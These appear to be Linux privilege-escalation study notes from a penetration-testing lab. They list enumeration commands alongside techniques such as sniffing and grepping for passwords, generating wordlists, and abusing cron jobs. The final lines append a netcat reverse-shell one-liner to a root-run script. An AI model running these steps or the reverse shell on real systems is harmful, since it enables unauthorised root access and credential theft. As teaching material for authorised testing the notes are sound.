Bash script to check for privilege escalation vectors: /usr/bin/unix-privesc-check
Note: This runs via /bin/sh by default, run with bash to avoid issues with if statements.
Exposed Confidential Information
Inspecting User Trails
Check environment variables via env, dig into where they come from if important information is stored to validate it.
Creating a custom wordlist with crunch:
Inspecting Service Footprints
Watching for processes that may be started with important information:
If we have privileges to capture network traffice:
Insecure File Permissions
Abusing Cron Jobs
Searching syslog for cronjobs (also reviewing /var/log/cron.log):
Abusing Password Authentication
If the /etc/passwd file is writable, we can abuse this due to Linux using authentication here prior to /etc/shadow for backwards compatability.
Generating a hash via openssl then adding it to /etc/passwd if it's writable:
Insecure System Components
Abusing Setuid Binaries and Capabilities
Searching for binaries with capability misconfigurations:
Abusing Sudo
See what commands can be potentially abused via sudo:
Exploiting Kernel Vulnerabilities
Kernel exploits can be volatile, be careful just tossing them around.
# Various places to gather information
kali@kali:~$ hostname # Device name
kali@kali:~$ cat /etc/issue # OS Version
kali@kali:~$ cat /etc/os-release # Release-specific information
kali@kali:~$ uname -a # Kernel Version & Architecture
kali@kali:~$ ps aux # List all running services (with or without a tty) in user-readable format
kali@kali:~$ ip a # TCP/IP information for every network adapter
kali@kali:~$ routel # List routing information
kali@kali:~$ ss -anp # List all network connections w/o name resolution, including process name owning the connection
kali@kali:~$ cat /etc/iptables/rules.v4 # Reading firewall rules
kali@kali:~$ ls -lah /etc/cron* # Scheduled task scripts
kali@kali:~$ crontab -l # List the current user's scheduled jobs
kali@kali:~$ dpkg -l # List installed applications on Debian system
kali@kali:~$ find / -writable -type d 2>/dev/null # Finding all writable directories
kali@kali:~$ cat /etc/fstab # List all auto-mounted filesystems
kali@kali:~$ mount # List all currently mounted filesystems
kali@kali:~$ lsblk # View all available disks
kali@kali:~$ lsmod # List kernel modules
kali@kali:~$ /sbin/modinfo <module> # Gather additional information on a kernel module
kali@kali:~$ find / -perm -u=s -type f 2>/dev/null # Finding all files with the SUID bit set
# This generates a wordlist with a minimum and maximum character length of 6, specifying the pattern with -t.
kali@kali:~$ crunch 6 6 -t Lab%%% > wordlist
kali@kali:~$ watch -n 1 'ps aux | grep -i pass'
kali@kali:~$ sudo tcpdump -i <interface> -A | grep -i 'pass'
kali@kali:~$ grep 'CRON' /var/log/syslog
# Determining permission of script run as root via cronjob
kali@kali:~$ ls -l /home/joe/.scripts/user_backups.sh
# Adding a one-liner reverse shell to the script
kali@kali:~$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your.listener.ip.here port >/tmp/f" >> user_backups.sh
